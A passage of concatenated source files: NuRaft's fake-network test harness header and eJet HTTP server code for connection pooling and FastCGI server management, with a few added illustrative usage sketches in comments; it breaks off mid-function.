// Reference to buffer to read or write.
buffer& buf_;
// Current position.
size_t pos_;
};
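// (Editorial sketch, not part of the original header.) Symmetric write/read of a
// few fields, assuming `buf` has already been allocated large enough for the
// payload and its cursor is at position 0.
inline void buffer_serializer_usage_example(buffer& buf) {
    buffer_serializer ws(buf);
    ws.put_u32(42);               // fixed-width field
    ws.put_str("hello");          // 4-byte length prefix followed by the bytes

    buffer_serializer rs(buf);
    uint32_t magic = rs.get_u32();         // 42
    std::string greeting = rs.get_str();   // "hello"
    (void)magic; (void)greeting;
}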
}
<|start_filename|>tests/unit/fake_network.hxx<|end_filename|>
/************************************************************************
Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#pragma once
#include "nuraft.hxx"
#include <map>
#include <unordered_map>
class SimpleLogger;
namespace nuraft {
class FakeClient;
class FakeNetworkBase;
class FakeNetwork
: public rpc_client_factory
, public rpc_listener
, public std::enable_shared_from_this<FakeNetwork>
{
public:
FakeNetwork(const std::string& _endpoint,
ptr<FakeNetworkBase>& _base);
struct ReqPkg {
ReqPkg(ptr<req_msg>& _req, rpc_handler& _when_done)
: req(_req), whenDone(_when_done)
{}
ptr<req_msg> req;
rpc_handler whenDone;
};
struct RespPkg {
RespPkg(ptr<resp_msg>& _resp, rpc_handler& _when_done)
: resp(_resp), whenDone(_when_done)
{}
ptr<resp_msg> resp;
rpc_handler whenDone;
};
FakeNetworkBase* getBase() const { return base.get(); }
std::string getEndpoint() const { return myEndpoint; }
ptr<rpc_client> create_client(const std::string& endpoint);
void listen(ptr<msg_handler>& handler);
ptr<resp_msg> gotMsg(ptr<req_msg>& msg);
bool execReqResp(const std::string& endpoint = std::string());
ptr<FakeClient> findClient(const std::string& endpoint);
bool delieverReqTo(const std::string& endpoint,
bool random_order = false);
void delieverAllTo(const std::string& endpoint);
bool makeReqFail(const std::string& endpoint,
bool random_order = false);
void makeReqFailAll(const std::string& endpoint);
bool handleRespFrom(const std::string& endpoint,
bool random_order = false);
void handleAllFrom(const std::string& endpoint);
size_t getNumPendingReqs(const std::string& endpoint);
size_t getNumPendingResps(const std::string& endpoint);
void goesOffline() { online = false; }
void goesOnline() { online = true; }
bool isOnline() const { return online; }
void stop();
void shutdown();
private:
std::string myEndpoint;
ptr<FakeNetworkBase> base;
ptr<msg_handler> handler;
// NOTE: We don't use `unordered_map` as the order of traversal
    // will differ across platforms. We should make
// the test deterministic.
std::map< std::string, ptr<FakeClient> > clients;
std::mutex clientsLock;
std::list< ptr<FakeClient> > staleClients;
bool online;
};
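// (Editorial sketch, not part of the original header.) Typical test wiring,
// assuming a shared `base` (ptr<FakeNetworkBase>) and two endpoints "S1"/"S2";
// all names below are placeholders:
//
//   ptr<FakeNetwork> net1 = cs_new<FakeNetwork>("S1", base);
//   ptr<FakeNetwork> net2 = cs_new<FakeNetwork>("S2", base);
//   base->addNetwork(net1);
//   base->addNetwork(net2);
//   // ... create raft_server instances using net1/net2 as their
//   //     rpc_client_factory / rpc_listener ...
//   net1->execReqResp();   // deterministically deliver pending requests/responses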
class FakeNetworkBase {
public:
FakeNetworkBase();
~FakeNetworkBase() { destroy(); }
void destroy();
void addNetwork(ptr<FakeNetwork>& net);
void removeNetwork(const std::string& endpoint);
FakeNetwork* findNetwork(const std::string& endpoint);
SimpleLogger* getLogger() const { return myLog; }
private:
// <endpoint, network instance>
std::map<std::string, ptr<FakeNetwork>> nets;
SimpleLogger* myLog;
};
class FakeClient : public rpc_client {
friend class FakeNetwork;
public:
FakeClient(FakeNetwork* mother,
FakeNetwork* dst);
~FakeClient();
void send(ptr<req_msg>& req, rpc_handler& when_done, uint64_t send_timeout_ms = 0);
void dropPackets();
bool isDstOnline();
uint64_t get_id() const;
bool is_abandoned() const;
private:
uint64_t myId;
FakeNetwork* motherNet;
FakeNetwork* dstNet;
std::list<FakeNetwork::ReqPkg> pendingReqs;
std::list<FakeNetwork::RespPkg> pendingResps;
};
class FakeTimer : public delayed_task_scheduler {
public:
FakeTimer(const std::string& endpoint,
SimpleLogger* logger = nullptr);
void schedule(ptr<delayed_task>& task, int32 milliseconds);
void cancel(ptr<delayed_task>& task);
void invoke(int type);
size_t getNumPendingTasks(int type = -1);
private:
void cancel_impl(ptr<delayed_task>& task);
std::string myEndpoint;
std::mutex tasksLock;
std::list< ptr<delayed_task> > tasks;
SimpleLogger* myLog;
};
} // namespace nuraft;
| fankux/NuRaft |
<|start_filename|>src/http_con.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_srv.h"
#include "http_con.h"
#include "http_srv_io.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_pump.h"
#include "http_ssl.h"
extern HTTPMgmt * gp_httpmgmt;
int http_con_cmp_http_con(void * a, void * b)
{
HTTPCon * acon = (HTTPCon *)a;
HTTPCon * bcon = (HTTPCon *)b;
if (!acon || !bcon) return -1;
if (acon->conid == bcon->conid) return 0;
if (acon->conid > bcon->conid) return 1;
return -1;
}
int http_con_cmp_conid (void * a, void * pat)
{
HTTPCon * pcon = (HTTPCon *)a;
ulong cid = *(ulong *)pat;
if (!pcon || !pat) return -1;
if (pcon->conid == cid) return 0;
if (pcon->conid > cid) return 1;
return -1;
}
ulong http_con_hash_func (void * key)
{
ulong cid = *(ulong *)key;
return cid;
}
int http_con_init (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return -1;
pcon->hl = NULL;
pcon->casetype = 0x00;
pcon->reqdiag = NULL;
pcon->reqdiagobj = NULL;
pcon->conid = 0;
pcon->rcv_state = HTTP_CON_NULL;
pcon->snd_state = HTTP_CON_IDLE;
memset(&pcon->srcip, 0, sizeof(pcon->srcip));
pcon->srcport = 0;
memset(&pcon->dstip, 0, sizeof(pcon->dstip));
pcon->dstport = 0;
InitializeCriticalSection(&pcon->rcvCS);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
#ifdef HAVE_OPENSSL
if (pcon->sslctx) {
pcon->sslctx = NULL;
}
#endif
if (pcon->tunnelcon) {
pcon->tunnelcon = NULL;
}
pcon->tunnelconid = 0;
pcon->read_ignored = 0;
if (pcon->rcvstream == NULL)
pcon->rcvstream = frame_new(8192);
frame_empty(pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
pcon->stamp = 0;
pcon->createtime = 0;
pcon->transbgn = 0;
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
pcon->retrytimes = 0;
pcon->reqnum = 0;
pcon->resnum = 0;
pcon->keepalive = 0;
pcon->ssl_link = 0;
pcon->ssl_handshaked = 0;
pcon->transact = 0;
pcon->httptunnel = 0;
pcon->tunnelself = 0;
if (pcon->msg) {
pcon->msg = NULL;
}
InitializeCriticalSection(&pcon->msglistCS);
if (pcon->msg_list == NULL) {
pcon->msg_list = arr_new(4);
}
while (arr_num(pcon->msg_list) > 0)
http_msg_close(arr_pop(pcon->msg_list));
arr_zero(pcon->msg_list);
pcon->srv = NULL;
return 0;
}
int http_con_free (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return -1;
pcon->rcv_state = HTTP_CON_NULL;
pcon->snd_state = HTTP_CON_IDLE;
if (pcon->msg) {
pcon->msg = NULL;
}
DeleteCriticalSection(&pcon->rcvCS);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->tunnelcon) {
pcon->tunnelcon = NULL;
}
pcon->tunnelconid = 0;
pcon->read_ignored = 0;
#ifdef HAVE_OPENSSL
if (pcon->sslctx) {
pcon->sslctx = NULL;
}
if (pcon->ssl_link) {
if (pcon->ssl) {
http_ssl_free(pcon->ssl);
pcon->ssl = NULL;
}
}
#endif
frame_delete(&pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
DeleteCriticalSection(&pcon->msglistCS);
arr_free(pcon->msg_list);
kfree(pcon);
return 0;
}
void * http_con_fetch (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
if (!mgmt) return NULL;
pcon = bpool_fetch(mgmt->con_pool);
if (!pcon) {
pcon = kzalloc(sizeof(*pcon));
if (!pcon) return NULL;
pcon->mgmt = mgmt;
http_con_init(pcon);
}
EnterCriticalSection(&mgmt->conCS);
pcon->conid = mgmt->conid++;
LeaveCriticalSection(&mgmt->conCS);
http_mgmt_con_add(mgmt, pcon);
pcon->mgmt = mgmt;
pcon->pcore = mgmt->pcore;
return pcon;
}
int http_con_recycle (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)gp_httpmgmt;
if (pcon->casetype == HTTP_CLIENT) {
while (arr_num(pcon->msg_list) > 0) {
msg = arr_pop(pcon->msg_list);
http_msg_close(msg);
}
arr_zero(pcon->msg_list);
pcon->msg = NULL;
} else {
while (arr_num(pcon->msg_list) > 0) {
msg = arr_pop(pcon->msg_list);
if (msg && msg->tear_down_notify)
(*msg->tear_down_notify)(msg, msg->tear_down_para);
http_msg_close(msg);
}
arr_zero(pcon->msg_list);
}
pcon->rcv_state = HTTP_CON_NULL;
pcon->snd_state = HTTP_CON_IDLE;
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->tunnelcon) {
pcon->tunnelcon = NULL;
}
pcon->tunnelconid = 0;
pcon->read_ignored = 0;
#ifdef HAVE_OPENSSL
if (pcon->sslctx) {
pcon->sslctx = NULL;
}
if (pcon->ssl_link) {
if (pcon->ssl) {
http_ssl_free(pcon->ssl);
pcon->ssl = NULL;
}
}
#endif
if (frame_size(pcon->rcvstream) > 16384)
frame_delete(&pcon->rcvstream);
frame_empty(pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
if (mgmt && mgmt->con_pool)
bpool_recycle(mgmt->con_pool, pcon);
else
http_con_free(pcon);
return 0;
}
int http_con_close (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return -1;
if (http_mgmt_con_del(gp_httpmgmt, pcon->conid) != pcon) {
return -2;
}
if (pcon->srv) {
http_srv_con_del(pcon->srv, pcon->conid);
}
return http_con_recycle(pcon);
}
void * http_con_open (void * vsrv, char * dstip, int dstport, int ssl_link)
{
HTTPSrv * srv = (HTTPSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
HTTPCon * pcon = NULL;
if (srv) {
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return NULL;
pcon = http_con_fetch(mgmt);
if (!pcon) return NULL;
strcpy(pcon->dstip, srv->ip);
pcon->dstport = srv->port;
pcon->casetype = HTTP_CLIENT;
pcon->ssl_link = srv->ssl_link;
pcon->srv = srv;
} else {
mgmt = gp_httpmgmt;
pcon = http_con_fetch(mgmt);
if (!pcon) return NULL;
strcpy(pcon->dstip, dstip);
pcon->dstport = dstport;
pcon->casetype = HTTP_CLIENT;
pcon->ssl_link = ssl_link;
pcon->srv = NULL;
}
time(&pcon->stamp);
if (http_con_connect(pcon) < 0) {
http_srv_set_active(pcon->srv, 0);
return NULL;
}
http_srv_con_add(srv, pcon);
return pcon;
}
int http_con_connect (void * vpcon)
{
HTTPCon * pcon = (HTTPCon *)vpcon;
HTTPMgmt * mgmt = NULL;
int ret = 0;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
for (pcon->retrytimes++ ; pcon->retrytimes < 3; pcon->retrytimes++) {
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
EnterCriticalSection(&pcon->rcvCS);
pcon->pdev = eptcp_connect(pcon->pcore,
pcon->dstip, pcon->dstport,
NULL, 0,
(void *)pcon->conid, &ret,
http_pump, pcon->mgmt);
if (!pcon->pdev) {
LeaveCriticalSection(&pcon->rcvCS);
continue;
}
if (ret >= 0) { //connected successfully
LeaveCriticalSection(&pcon->rcvCS);
ret = http_con_connected(pcon);
if (ret < 0) continue;
} else {
pcon->snd_state = HTTP_CON_CONNECTING;
pcon->ready_timer = iotimer_start(pcon->pcore,
mgmt->srv_connecting_time * 1000,
t_http_srv_con_build,
(void *)pcon->conid,
http_pump, pcon->mgmt);
LeaveCriticalSection(&pcon->rcvCS);
}
return 0;
}
tolog(1, "eJet - TCP Connect: failed connecting to '%s:%d'.\n",
pcon->dstip, pcon->dstport);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
pcon->snd_state = HTTP_CON_IDLE;
http_con_close(pcon);
return -100;
}
int http_con_connected (void * vpcon)
{
HTTPCon * pcon = (HTTPCon *)vpcon;
HTTPMgmt * mgmt = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
http_srv_set_active(pcon->srv, 1);
pcon->rcv_state = HTTP_CON_READY;
pcon->snd_state = HTTP_CON_SEND_READY;
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
time(&pcon->stamp);
pcon->life_timer = iotimer_start(mgmt->pcore,
mgmt->conn_check_interval * 1000,
t_http_srv_con_life,
(void *)pcon->conid,
http_pump,
mgmt);
#ifdef HAVE_OPENSSL
if (pcon->ssl_link) {
pcon->sslctx = http_srv_ssl_ctx_get(pcon->srv, pcon);
pcon->ssl = http_ssl_new(pcon->sslctx, pcon);
pcon->ssl_handshaked = 0;
pcon->snd_state = HTTP_CON_SSL_HANDSHAKING;
return http_ssl_connect(pcon);
}
#endif
/* send the pending request to the origin server immediately after the connection is established */
if (arr_num(pcon->msg_list) > 0 || http_srv_msg_num(pcon->srv) || pcon->httptunnel > 0) {
http_srv_send(pcon);
}
return 0;
}
char * http_con_srcip (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return "";
return pcon->srcip;
}
int http_con_srcport (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return -1;
return pcon->srcport;
}
int http_con_reqnum (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return 0;
return pcon->reqnum;
}
ulong http_con_id (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return 0;
return pcon->conid;
}
void * http_con_iodev (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return NULL;
return pcon->pdev;
}
int http_con_msg_add (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
int i, num;
if (!pcon) return -1;
if (!msg) return -2;
EnterCriticalSection(&pcon->msglistCS);
msg->pcon = pcon;
msg->conid = pcon->conid;
num = arr_num(pcon->msg_list);
for (i = 0; i < num; i++) {
if (arr_value(pcon->msg_list, i) == msg) {
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
}
arr_push(pcon->msg_list, msg);
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
int http_con_msg_del (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!pcon) return -1;
if (!msg) return -2;
EnterCriticalSection(&pcon->msglistCS);
arr_delete_ptr(pcon->msg_list, msg);
if (msg->pcon == pcon)
msg->pcon = NULL;
if (msg->conid == pcon->conid)
msg->conid = 0;
if (pcon->msg == msg)
pcon->msg = NULL;
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
void * http_con_msg_first (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = NULL;
if (!pcon) return NULL;
EnterCriticalSection(&pcon->msglistCS);
msg = arr_value(pcon->msg_list, 0);
LeaveCriticalSection(&pcon->msglistCS);
return msg;
}
void * http_con_msg_last (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = NULL;
int num = 0;
if (!pcon) return NULL;
EnterCriticalSection(&pcon->msglistCS);
num = arr_num(pcon->msg_list);
if (num > 0)
msg = arr_value(pcon->msg_list, num - 1);
LeaveCriticalSection(&pcon->msglistCS);
return msg;
}
<|start_filename|>src/http_fcgi_srv.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_con.h"
#include "http_fcgi_msg.h"
#include "http_fcgi_io.h"
int http_fcgisrv_init (void * vsrv);
int http_fcgisrv_free (void * vsrv);
int http_fcgisrv_recycle (void * vsrv);
void * http_fcgisrv_fetch (void * vmgmt);
int http_fcgisrv_cmp_cgisrv (void * a, void * b)
{
FcgiSrv * psrv = (FcgiSrv *)a;
char * cgisrv = (char *)b;
if (!psrv || !cgisrv) return -1;
return strcasecmp(psrv->cgisrv, cgisrv);
}
int http_mgmt_fcgisrv_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
InitializeCriticalSection(&mgmt->fcgisrvCS);
mgmt->fcgisrv_table = ht_only_new(13, http_fcgisrv_cmp_cgisrv);
if (!mgmt->fcgisrv_pool) {
mgmt->fcgisrv_pool = mpool_alloc();
mpool_set_initfunc (mgmt->fcgisrv_pool, http_fcgisrv_init);
mpool_set_freefunc (mgmt->fcgisrv_pool, http_fcgisrv_free);
mpool_set_unitsize (mgmt->fcgisrv_pool, sizeof(FcgiSrv));
mpool_set_allocnum (mgmt->fcgisrv_pool, 2);
}
if (!mgmt->fcgicon_pool) {
mgmt->fcgicon_pool = mpool_alloc();
mpool_set_initfunc (mgmt->fcgicon_pool, http_fcgicon_init);
mpool_set_freefunc (mgmt->fcgicon_pool, http_fcgicon_free);
mpool_set_unitsize (mgmt->fcgicon_pool, sizeof(FcgiCon));
mpool_set_allocnum (mgmt->fcgicon_pool, 16);
}
if (!mgmt->fcgimsg_pool) {
mgmt->fcgimsg_pool = mpool_alloc();
mpool_set_initfunc (mgmt->fcgimsg_pool, http_fcgimsg_init);
mpool_set_freefunc (mgmt->fcgimsg_pool, http_fcgimsg_free);
mpool_set_unitsize (mgmt->fcgimsg_pool, sizeof(FcgiMsg));
mpool_set_allocnum (mgmt->fcgimsg_pool, 32);
}
tolog(1, "eJet - FastCGI module (Unix Socket/TCP) init.\n");
return 0;
}
int http_mgmt_fcgisrv_clean (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
int i, num;
if (!mgmt) return -1;
if (mgmt->fcgisrv_table) {
num = ht_num(mgmt->fcgisrv_table);
for (i = 0; i < num; i++) {
srv = ht_value(mgmt->fcgisrv_table, i);
http_fcgisrv_free(srv);
}
ht_free(mgmt->fcgisrv_table);
mgmt->fcgisrv_table = NULL;
}
DeleteCriticalSection(&mgmt->fcgisrvCS);
if (mgmt->fcgisrv_pool) {
mpool_free(mgmt->fcgisrv_pool);
mgmt->fcgisrv_pool = NULL;
}
if (mgmt->fcgicon_pool) {
mpool_free(mgmt->fcgicon_pool);
mgmt->fcgicon_pool = NULL;
}
if (mgmt->fcgimsg_pool) {
mpool_free(mgmt->fcgimsg_pool);
mgmt->fcgimsg_pool = NULL;
}
tolog(1, "eJet - FastCGI module (Unix Socket/TCP) cleaned.\n");
return 0;
}
int http_mgmt_fcgisrv_add (void * vmgmt, void * vsrv)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = (FcgiSrv *)vsrv;
if (!mgmt) return -1;
if (!srv) return -2;
EnterCriticalSection(&mgmt->srvCS);
ht_set(mgmt->fcgisrv_table, &srv->cgisrv, srv);
LeaveCriticalSection(&mgmt->srvCS);
return 0;
}
void * http_mgmt_fcgisrv_del (void * vmgmt, char * cgisrv)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->srvCS);
srv = ht_delete(mgmt->fcgisrv_table, cgisrv);
LeaveCriticalSection(&mgmt->srvCS);
return srv;
}
void * http_mgmt_fcgisrv_get (void * vmgmt, char * cgisrv)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->srvCS);
srv = ht_get(mgmt->fcgisrv_table, cgisrv);
LeaveCriticalSection(&mgmt->srvCS);
return srv;
}
int http_fcgisrv_init (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
if (!srv) return -1;
srv->cgisrv[0] = '\0';
srv->socktype = 0;
memset(srv->ip, 0, sizeof(srv->ip));
srv->port = 0;
InitializeCriticalSection(&srv->msgCS);
srv->msgid = 1;
if (!srv->msg_table) {
srv->msg_table = ht_only_new(300, http_fcgimsg_cmp_msgid);
ht_set_hash_func(srv->msg_table, http_fcgimsg_hash_msgid);
}
ht_zero(srv->msg_table);
if (!srv->msg_fifo) srv->msg_fifo = ar_fifo_new(4);
ar_fifo_zero(srv->msg_fifo);
srv->maxcon = 1;
InitializeCriticalSection(&srv->conCS);
srv->conid = 1;
if (!srv->con_tree) {
srv->con_tree = rbtree_new(http_fcgicon_cmp_conid, 1);
}
rbtree_zero(srv->con_tree);
if (srv->life_timer) {
iotimer_stop(srv->life_timer);
srv->life_timer = NULL;
}
return 0;
}
int http_fcgisrv_free (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
rbtnode_t * rbtn = NULL;
FcgiCon * pcon = NULL;
FcgiMsg * msg = NULL;
int i, num;
if (!srv) return -1;
if (srv->life_timer) {
iotimer_stop(srv->life_timer);
srv->life_timer = NULL;
}
DeleteCriticalSection(&srv->conCS);
num = rbtree_num(srv->con_tree);
rbtn = rbtree_min_node(srv->con_tree);
for (i = 0; i < num && rbtn; i++) {
pcon = RBTObj(rbtn);
rbtn = rbtnode_next(rbtn);
if (!pcon) continue;
http_fcgicon_close(pcon);
}
rbtree_free(srv->con_tree);
/* note: http_fcgicon_close should recycle the FcgiMsg instance to srv->msg_fifo */
num = ht_num(srv->msg_table);
for (i = 0; i < num; i++) {
msg = ht_value(srv->msg_table, i);
if (!msg) continue;
http_fcgimsg_close(msg);
}
ht_free(srv->msg_table);
DeleteCriticalSection(&srv->msgCS);
ar_fifo_free(srv->msg_fifo);
return 0;
}
int http_fcgisrv_recycle (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
FcgiCon * pcon = NULL;
rbtnode_t * rbtn = NULL;
int i, num;
if (!srv) return -1;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt || !mgmt->fcgisrv_pool)
return http_fcgisrv_free(srv);
if (srv->life_timer) {
iotimer_stop(srv->life_timer);
srv->life_timer = NULL;
}
num = rbtree_num(srv->con_tree);
rbtn = rbtree_min_node(srv->con_tree);
for (i = 0; i < num && rbtn; i++) {
pcon = RBTObj(rbtn);
rbtn = rbtnode_next(rbtn);
http_fcgicon_close(pcon);
}
rbtree_zero(srv->con_tree);
/* note: http_fcgicon_close should recycle the FcgiMsg instance to srv->msg_fifo */
while (ar_fifo_num(srv->msg_fifo) > 0)
http_msg_close(ar_fifo_out(srv->msg_fifo));
ar_fifo_zero(srv->msg_fifo);
mpool_recycle(mgmt->fcgisrv_pool, srv);
return 0;
}
void * http_fcgisrv_fetch (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
if (!mgmt) return NULL;
srv = mpool_fetch(mgmt->fcgisrv_pool);
if (!srv) {
srv = kzalloc(sizeof(*srv));
http_fcgisrv_init(srv);
}
if (!srv) return NULL;
srv->mgmt = mgmt;
srv->pcore = mgmt->pcore;
return srv;
}
static int fcgisrv_parse (FcgiSrv * srv)
{
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
if (!srv) return -1;
pbgn = srv->cgisrv;
pend = pbgn + strlen(pbgn);
if (strncasecmp(pbgn, "unix:", 5) == 0) {
srv->socktype = 1;
str_secpy(srv->unixsock, sizeof(srv->unixsock)-1, pbgn + 5, pend - pbgn - 5);
return 0;
}
if (strncasecmp(pbgn, "fastcgi://", 10) == 0) {
srv->socktype = 0;
pbgn += 10;
poct = skipTo(pbgn, pend - pbgn, ":", 1);
if (poct > pbgn) {
str_secpy(srv->ip, sizeof(srv->ip) - 1, pbgn, poct - pbgn);
}
if (poct + 1 < pend && *poct == ':') {
srv->port = strtol(poct + 1, NULL, 10);
}
return 0;
}
return -2;
}
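/* Illustrative sketch, not part of the original source: the two cgisrv forms
 * accepted by fcgisrv_parse() above. Compiled only when FCGISRV_PARSE_SELFTEST
 * is defined, so it does not affect the normal build. */
#ifdef FCGISRV_PARSE_SELFTEST
#include <assert.h>
#include <string.h>
static void fcgisrv_parse_selftest (void)
{
    FcgiSrv srv;
    /* TCP form: "fastcgi://<ip>:<port>" */
    memset(&srv, 0, sizeof(srv));
    strncpy(srv.cgisrv, "fastcgi://127.0.0.1:9000", sizeof(srv.cgisrv) - 1);
    assert(fcgisrv_parse(&srv) == 0);
    assert(srv.socktype == 0 && srv.port == 9000);
    /* Unix-socket form: "unix:<path>" */
    memset(&srv, 0, sizeof(srv));
    strncpy(srv.cgisrv, "unix:/var/run/php-fpm.sock", sizeof(srv.cgisrv) - 1);
    assert(fcgisrv_parse(&srv) == 0);
    assert(srv.socktype == 1);
}
#endif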
void * http_fcgisrv_open (void * vmgmt, char * cgisrv, int maxcon)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
uint8 newalloc = 0;
if (!mgmt || !cgisrv) return NULL;
srv = http_mgmt_fcgisrv_get(mgmt, cgisrv);
if (!srv) {
srv = http_fcgisrv_fetch(mgmt);
if (!srv) return NULL;
newalloc = 1;
strncpy(srv->cgisrv, cgisrv, sizeof(srv->cgisrv)-1);
fcgisrv_parse(srv);
http_mgmt_fcgisrv_add(mgmt, srv);
}
srv->maxcon = maxcon;
if (srv->maxcon < 20) srv->maxcon = 50;
time(&srv->stamp);
if (newalloc)
srv->life_timer = iotimer_start(mgmt->pcore,
mgmt->srv_check_interval * 1000,
t_fcgi_srv_life,
(void *)srv,
http_fcgisrv_pump, srv);
return srv;
}
int http_fcgisrv_close(void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
if (!srv) return -1;
mgmt = (HTTPMgmt *)srv->mgmt;
if (http_mgmt_fcgisrv_del(mgmt, srv->cgisrv) == NULL) return 0;
return http_fcgisrv_recycle(srv);
}
uint16 http_fcgisrv_get_msgid (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
uint16 msgid = 1;
if (!srv) return msgid;
EnterCriticalSection(&srv->conCS);
if (srv->msgid == 0)
srv->msgid = 1;
msgid = srv->msgid++;
LeaveCriticalSection(&srv->conCS);
return msgid;
}
ulong http_fcgisrv_get_conid (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
ulong conid = 0;
if (!srv) return conid;
EnterCriticalSection(&srv->conCS);
if (srv->conid == 0)
srv->conid = 1;
conid = srv->conid++;
LeaveCriticalSection(&srv->conCS);
return conid;
}
void * http_fcgisrv_connect (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
rbtnode_t * rbtn = NULL;
int connum = 0;
int i = 0;
if (!srv) return NULL;
EnterCriticalSection(&srv->conCS);
connum = rbtree_num(srv->con_tree);
rbtn = rbtree_min_node(srv->con_tree);
for (i = 0; i < connum && rbtn; i++) {
pcon = RBTObj(rbtn);
rbtn = rbtnode_next(rbtn);
if ( !pcon ||
pcon->snd_state == FCGI_CON_FEEDING ||
arr_num(pcon->msg_list) > 0)
continue;
LeaveCriticalSection(&srv->conCS);
return pcon;
}
LeaveCriticalSection(&srv->conCS);
return http_fcgicon_open(srv);
}
int http_fcgisrv_msg_add (void * vsrv, void * vmsg)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!srv) return -1;
if (!msg) return -2;
EnterCriticalSection(&srv->msgCS);
ht_set(srv->msg_table, &msg->msgid, msg);
LeaveCriticalSection(&srv->msgCS);
return 0;
}
void * http_fcgisrv_msg_get (void * vsrv, uint16 msgid)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->msgCS);
msg = ht_get(srv->msg_table, &msgid);
